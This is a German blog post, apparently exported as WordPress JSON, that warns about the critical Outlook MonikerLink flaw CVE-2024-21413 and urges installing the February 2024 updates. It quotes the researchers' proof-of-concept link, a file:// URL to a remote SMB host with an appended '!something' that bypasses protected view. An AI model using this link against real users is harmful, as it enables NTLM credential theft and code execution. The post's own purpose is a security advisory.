{"id":292255,"date":"2024-02-15T08:41:17","date_gmt":"2024-02-15T07:41:17","guid":{"rendered":"https:\/\/www.borncity.com\/blog\/?p=292255"},"modified":"2024-02-15T14:55:39","modified_gmt":"2024-02-15T13:55:39","slug":"warnung-vor-kritischer-outlook-rce-schwachstelle-cve-2024-21413","status":"publish","type":"post","link":"https:\/\/borncity.com\/blog\/2024\/02\/15\/warnung-vor-kritischer-outlook-rce-schwachstelle-cve-2024-21413\/","title":{"rendered":"Warnung vor kritischer Outlook RCE-Schwachstelle CVE-2024-21413"},"content":{"rendered":"

[English<\/a>]Ich ziehe es nochmals separat heraus: In Microsoft Outlook wurde eine als kritisch eingestufte CVE-2024-21413 bekannt, die mit den Februar 2024 Sicherheitsupdates geschlossen wird. Die Remote Code Execution-Schwachstelle l\u00e4sst sich geradezu trivial ausnutzen. Hier nochmals einige Informationen dazu.<\/p>\n

<\/p>\n

Outlook RCE-Schwachstelle CVE-2024-21413<\/h2>\n

\"\"Ich habe die Schwachstelle CVE-2024-21413<\/a> bisher noch nicht im Blog thematisiert. Es handelt sich um eine Remote Code Execution (RCE) Schwachstelle in Microsoft Outlook, die in Outlook 2016 bis 2021 auftreten soll (siehe https:\/\/www.cve.org\/CVERecord?id=CVE-2024-21413<\/a>). Von Microsoft gibt es diesen CVE-2024-21413<\/a>-Supportbeitrag vom 13. Februar 2024, der am 14. Februar nochmals aktualisiert wurde.<\/p>\n

Die von Checkpoint Security aufgedeckte Schwachstelle erm\u00f6glicht einem Angreifer die gesch\u00fctzte Office-Ansicht zu umgehen und das Dokument im Bearbeitungsmodus statt im gesch\u00fctzten Modus zu \u00f6ffnen. Sogar das Vorschaufenster f\u00fcr Mails in Microsoft Outlook reicht als Angriffsvektor. Ein Angreifer, der diese Sicherheitsl\u00fccke erfolgreich ausnutzt, k\u00f6nnte hohe so Privilegien erlangen, die Lese-, Schreib- und L\u00f6schfunktionen umfassen.<\/p>\n

Dazu muss der Angreifer einen b\u00f6sartigen Link erstellen, der das Protected View-Protokoll umgeht. Das f\u00fchrt dann zum Abfluss lokaler NTLM-Anmeldeinformationen und zur Remotecodeausf\u00fchrung (RCE). Microsoft stuft das Ganze als kritisch ein.<\/p>\n

Triviale Ausnutzbarkeit von CVE-2024-21413<\/h2>\n

Die Entdecker von Checkpoint Security haben zum 14. Februar 2024 die als MonikerLink bezeichnete Schwachstelle CVE-2024-21413 im Beitrag THE RISKS OF THE #MONIKERLINK BUG IN MICROSOFT OUTLOOK AND THE BIG PICTURE<\/a> dokumentiert und weisen in nachfolgendem Tweet<\/a> darauf hin.<\/p>\n

\"Outlook<\/a><\/p>\n

Bei der Analyse von Angriffsvektoren \u00fcber Hyperlinks in Outlook ist den Sicherheitsforschern eine besondere Konstruktion aufgefallen, mit der sich die Schutzmechanismen von Outlook umgehen lassen. Wird in einem Dokument ein Hyperlink mit http oder https eingebettet, startet Outlook den Standard-Browser, um diesen anzuzeigen. Verweist der URL-Link auf ein Anwendungs-URL-Protokoll, wie zum Beispiel:<\/p>\n

<a href=\"skype:SkypeName?call\">Call me on Skype<\/a><\/em><\/p>\n

erscheint eine Warnung. Outlook meldet, dass man ein potentielles Sicherheitsrisiko entdeckt hat. So weit so gut, aber was ist, wenn diese URL etwas abgewandelt wird – zum Beispiel file <\/em>statt skype?<\/p>\n

<\/p>\n

Nach einigen Experimenten haben die Sicherheitsforscher festgestellt, dass ein Ausrufezeichen ausreicht, um die Schutzmechanismen zu umgehen. Nachfolgender Link demonstriert dies:<\/p>\n

<a href=\"file:\/\/\/\\\\10.10.111.111\\test\\test.rtf!something\">CLICK ME<\/a><\/p>\n

Das angeh\u00e4ngte !something verwirrt den Parser f\u00fcr die URL, so dass dieser den Link freigibt. Der Check Point Research-Beitrag l\u00f6st die Details auf (die Kollegen von Bleeping Computer gehen hier<\/a> auch auf das Thema ein) und zeigt, wie trivial das Ganze ausgenutzt werden kann. In diesem Kommentar<\/a> weist ein Leser hin, das Microsoft seine eigene Einstufung in Bezug auf eine Ausnutzung ge\u00e4ndert und zur\u00fcckgenommen hat.<\/p>\n

Outlook updaten, um gesch\u00fctzt zu sein<\/h2>\n

Um gesch\u00fctzt zu sein, m\u00fcssen Kunden mit Office 2016 alle Updates f\u00fcr diese Office-Version von Februar 2024 installieren, die Microsoft in seinem CVE-2024-21413<\/a>-Supportbeitrag aufgelistet hat.<\/p>\n